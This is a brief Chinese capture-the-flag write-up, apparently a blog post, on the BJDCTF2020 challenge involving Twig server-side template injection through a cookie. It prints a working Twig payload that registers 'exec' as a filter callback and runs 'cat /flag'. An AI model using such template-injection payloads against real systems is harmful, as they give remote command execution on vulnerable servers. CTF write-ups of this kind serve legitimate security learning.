本文深入探讨了在BJDCTF2020比赛中遇到的一个Cookie中的Twig模板注入漏洞。通过分析包内容,作者发现了两个不同之处,并确认存在SSTI注入。尽管在页面上直接操作无法获取Flag,但通过测试构造了Payload,揭示了过滤机制的重要性。
详解模板注入漏洞
关于SSTI注入的一些理解
抓个包:
发现了两个包在cookie上的不同
判断是twig,经过测试发现是ssti注入
Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
注释:如果不抓包在页面是无法获得flag的,应该有过滤
最低0.47元/天 解锁文章
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
